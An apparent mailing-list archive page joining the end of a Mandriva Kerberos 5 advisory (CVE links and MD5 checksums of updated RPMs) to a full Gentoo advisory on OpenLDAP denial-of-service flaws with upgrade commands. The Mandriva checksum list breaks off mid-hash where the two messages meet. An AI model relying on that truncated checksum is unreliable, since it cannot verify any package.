 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5901
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5971
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0947
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-001.txt
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-002.txt
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.1:
 64c3f5c31177dcacc99b021ec6ed1271  
2007.1/i586/ftp-client-krb5-1.5.2-6.6mdv2007.1.i586.rpm
 11b4194bc9edba8c0951e44660ba9955  
2007.1/i586/ftp-server-krb5-1.5.2-6.6mdv2007.1.i586.rpm
 23794e6e0cb1d46a329c42a04f672c5f  
2007.1/i586/krb5-server-1.5.2-6.6mdv2007.1.i586.rpm
 0fbb29bd81c8452d937d30fbbda62242  
2007.1/i586/krb5-workstation-1.5.2-6.6mdv2007.1.i586.rpm
 8f4eea60bf4ea3bfc776f1c117ceb26d  
2007.1/i586/libkrb53-1.5.2-6.6mdv2007.1.i586.rpm
 fd5b1da0a056d995011d2b1a692e4292  
2007.1/i586/libkrb53-devel-1.5.2-6.6mdv2007.1.i586.rpm
 ca79ccbe3f286b9069f0ae028d9816f7  
2007.1/i586/telnet-client-krb5-1.5.2-6.6mdv2007.1.i586.rpm
 8a7c84f1fe1bbb5338723f28d12a9f21  
2007.1/i586/telnet-server-krb5-1.5.2-6.6mdv2007.1.i586.rpm 
 22830790ad7715479b7d4fbecc6c1e7f  2007.1/SRPMS/krb5-1.5.2-6.6mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 fc02060b7c1da08c33952e6c14fb5627  
2007.1/x86_64/ftp-client-krb5-1.5.2-6.6mdv2007.1.x86_64.rpm
 513fca34bdd1f2a5643a8e6adeb62e0e  
2007.1/x86_64/ftp-server-krb5-1.5.2-6.6mdv2007.1.x86_64.rpm
 4f42d639753a885212e6d62bfe84a121  
2007.1/x86_64/krb5-server-1.5.2-6.6mdv2007.1.x86_64.rpm
 6b2ca028321fb08199be20a4aedef4a0  
2007.1/x86_64/krb5-workstation-1.5.2-6.6mdv2007.1.x86_64.rpm
 4d453dc2a579e74e29dfc052197fedc1  
2007.1/x86_64/lib64krb53-1.5.2-6.6mdv2007.1.x86_64.rpm
 b22d9f1b515df1a5270d2d4c373b7dd3  
2007.1/x86_64/lib64krb53-devel-1.5.2-6.6mdv2007.1.x86_64.rpm
 21b245649de9e38e43782bd1a18922a7  
2007.1/x86_64/telnet-client-krb5-1.5.2-6.6mdv2007.1.x86_64.rpm
 1322374ab1c15b5c1392ee4ae5f915e7  
2007.1/x86_64/telnet-server-krb5-1.5.2-6.6mdv2007.1.x86_64.rpm 
 22830790ad7715479b7d4fbecc6c1e7f  2007.1/SRPMS/krb5-1.5.2-6.6mdv2007.1.src.rpm

 Mandriva Linux 2008.0:
 3ee5a309927b830bf8559a872161384b  
2008.0/i586/ftp-client-krb5-1.6.2-7.1mdv2008.0.i586.rpm
 1835baa43ab27aac2493dc7821bafa8a  
2008.0/i586/ftp-server-krb5-1.6.2-7.1mdv2008.0.i586.rpm
 5e8369c201ac4678a7bc46590107e45f  2008.0/i586/krb5-1.6.2-7.1mdv2008.0.i586.rpm
 94277e76faf2b75553c2e6250e428a43  
2008.0/i586/krb5-server-1.6.2-7.1mdv2008.0.i586.rpm
 695d5b85347b906401433fa55177be1a  
2008.0/i586/krb5-workstation-1.6.2-7.1mdv2008.0.i586.rpm
 4696cbae0ce644c265b74ff4ce59a865  
2008.0/i586/libkrb53-1.6.2-7.1mdv2008.0.i586.rpm
 cc8122a1c6a3449fc41d3022bbdffeb2  
2008.0/i586/libkrb53-devel-1.6.2-7.1mdv2008.0.i586.rpm
 d5e75835b35e81a3f7d038e501dabd1c  
2008.0/i586/telnet-client-krb5-1.6.2-7.1mdv2008.0.i586.rpm
 072b5ba782fbd1659ed8bd

[ GLSA 200803-28 ] OpenLDAP: Denial of Service vulnerabilities

2008-03-20 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200803-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: OpenLDAP: Denial of Service vulnerabilities
  Date: March 19, 2008
  Bugs: #197446, #209677
ID: 200803-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple Denial of Service vulnerabilities have been reported in
OpenLDAP.

Background
==

OpenLDAP Software is an open source implementation of the Lightweight
Directory Access Protocol.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  net-nds/openldap  < 2.3.41  >= 2.3.41

Description
===

The following errors have been discovered in OpenLDAP:

* Tony Blake discovered an error which exists within the
  normalisation of "objectClasses" (CVE-2007-5707).

* Thomas Sesselmann reported that, when running as a proxy-caching
  server the "add_filter_attrs()" function in
  servers/slapd/overlay/pcache.c does not correctly NULL terminate
  "new_attrs" (CVE-2007-5708).

* A double-free bug exists in attrs_free() in the file
  servers/slapd/back-bdb/modrdn.c, which was discovered by Jonathan
  Clarke (CVE-2008-0658).

Impact
==

A remote attacker can cause a Denial of Serivce by sending a malformed
"objectClasses" attribute, and via unknown vectors that prevent the
"new_attrs" array from being NULL terminated, and via a modrdn
operation with a NOOP (LDAP_X_NO_OPERATION) control.

Workaround
==

There is no known workaround at this time.

Resolution
==

All OpenLDAP users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-nds/openldap-2.3.41"

References
==

  [ 1 ] CVE-2007-5707
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5707
  [ 2 ] CVE-2007-5708
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5708
  [ 3 ] CVE-2008-0658
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0658

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-28.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH4ZoCuhJ+ozIKI5gRAuZYAKCXAX4sXc39JTd83l6VwVfnHdMsZACfQVfi
kTrjdz99Vifw47to09cOknQ=
=0mt1
-END PGP SIGNATURE-